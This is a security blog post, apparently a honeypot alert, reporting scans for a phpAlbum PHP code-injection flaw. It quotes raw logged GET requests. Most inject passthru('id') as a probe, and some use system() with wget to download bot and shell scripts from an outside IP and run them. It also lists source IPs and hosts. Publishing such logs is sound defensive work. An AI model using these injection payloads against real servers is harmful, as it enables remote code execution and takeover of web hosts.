[Honeypot Alert] phpAlbum PHP Code Execution Attacks

We have seen a number of scans probing for phpAlbum code execution vulns in our web honeypot logs:

GET /admin/main.php?cmd=setquality&var1=1%27.system%28%27echo%200wn3d.Nu%27%29.%27; HTTP/1.1GET /admin/main.php?cmd=setquality&var1=1%27.system%28%27wget%20http://72.41.115.123/.mods/pbot.txt%20-O%20pb.php;%20php%20pb.php;%20wget%20http://72.41.115.123/.mods/sh.txt%20-O%20h4rd.php%27%29.%27; HTTP/1.1GET /album/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1GET /albums/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1GET /apps/phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.0GET /apps/phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.0GET /apps/phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1GET /apps/phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1GET /images/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1GET /img/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1GET /main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.0GET /main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1GET /main.php?cmd=setquality&var1=1%27.system%28%27echo%200wn3d.Nu%27%29.%27; HTTP/1.1GET /main.php?cmd=setquality&var1=1%27.system%28%27wget%20http://72.41.115.123/.mods/pbot.txt%20-O%20pb.php;%20php%20pb.php;%20wget%20http://72.41.115.123/.mods/sh.txt%20-O%20h4rd.php%27%29.%27; HTTP/1.1GET /photoalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1GET /photoalbums/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1GET /photo/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1GET /photos/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1GET /phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.0GET /phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.0GET /phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1GET /phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1GET /phpAlbum/main.php?cmd=setquality&var1=1%27.system%28%27echo%200wn3d.Nu%27%29.%27; HTTP/1.1GET /phpAlbum/main.php?cmd=setquality&var1=1%27.system%28%27wget%20http://72.41.115.123/.mods/pbot.txt%20-O%20pb.php;%20php%20pb.php;%20wget%20http://72.41.115.123/.mods/sh.txt%20-O%20h4rd.php%27%29.%27; HTTP/1.1GET /pic/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1GET /pics/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1

Most of these requests are simply probes just to identify if a vulnerability exists by using the php "passthru" function to execute the OS "id" command. There are a few requests, however, to try and use "wget" to download some sort of malicous code onto the web server.

Here is a listing of IPs/hosts we have seen make these requests:

114.32.226.22114.32.50.243118.122.178.65118.97.50.11121.166.70.252122.255.96.164122.255.96.45159.213.90.53161.139.147.191161.139.147.193162-119-162-69.reverse.lstn.net182.50.129.163187.45.213.158187.61.15.34190.40.2.40190.82.94.131190.95.200.250193.169.56.24195.64.165.17200.175.53.196200.33.240.3200.63.96.126202.100.80.21202.109.129.166202.150.218.99202.28.37.63203.142.24.17211.144.82.8211.167.110.2212.252.120.11212.49.222.82212.92.13.110213.195.75.188218.77.120.135219.94.144.230220.162.244.251220.179.64.23221.224.13.25222.122.45.11046.163.115.4058.254.143.20458.254.202.10358.63.241.20959.108.108.10059.163.254.1860-250-15-2.hinet-ip.hinet.net61.19.45.11962.183.105.16462.225.155.9064.132.98.20065.255.176.2667.55.95.13268.78.199.24769.162.119.16272.47.253.19575.125.235.16278.131.55.17280.248.214.10381.169.165.13881.92.159.19482.193.36.9882.228.250.16385.18.206.22885.88.195.3485.88.195.3588.173.34.14488.40.179.24289.208.95.13089-97-247-147.ip2.fastwebnet.it91.189.70.22892.240.69.2492.51.132.7193.84.116.21694.124.120.4094.229.77.2595.87.194.7byr09a.trigger.co.zadns.integrant.camail.guiaslatinas.com.pymail.gymnaziumdc.czmail.ring.hupd5cdac.szokff01.ap.so-net.ne.jpreserve.cableplus.com.cnxs.5460.netxxxcnn3219.hospedagemdesites.ws

All requests had the same User-Agent string:

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0

Trustwave reserves the right to review all comments in the discussion below. Please note that for security and other reasons, we may not approve comments containing links.